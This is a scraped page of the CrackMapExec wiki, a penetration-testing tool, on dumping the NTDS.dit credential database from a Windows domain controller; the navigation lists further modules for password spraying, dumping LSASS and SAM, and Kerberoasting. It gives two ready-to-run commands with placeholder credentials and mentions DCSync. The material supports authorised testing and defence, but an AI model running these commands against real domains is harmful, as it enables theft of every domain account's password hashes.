πŸ”±
πŸ”±
πŸ”±
πŸ”±
CrackMapExec ~ CME WIKI
Public Release - v5.2.2@byt3bl33d3r@mpgn_x64
Search…
Introduction
πŸ”₯
News 2022
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
πŸ†•
BloodHound integration
Report bugs or new features
πŸ’²
Audit Mode
SMB protocol
πŸ†•
Scan for vulnerabilities
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
Dump SAM
Dump LSA
Dump NTDS.dit
Dump LSASS
Dump WIFI password
πŸ†•
Defeating LAPS
πŸ†•
Spooler, WebDav running ?
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
πŸ†•
Exploit ESC8 (adcs)
WINRM protocol
Password spraying
Authentication
Command execution
πŸ†•
Defeating LAPS
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
πŸ†•
RDP Protocol
Password spraying
Install aardwolf lib
Powered By GitBook
Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin Priviledges on target Domain Controller
1
2 methods are available:
2
(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with
3
additional drsuapi calls to convert the resultant linked-lists into readable format
4
vss - Uses the Volume Shadow copy Service
Copied!
1
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
2
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Copied!
You can also DCSYNC with the computer account of the DC
Remember to play this music everytime you got DA
Previous
Dump LSA
Next
Dump LSASS
Last modified 5mo ago
Copy link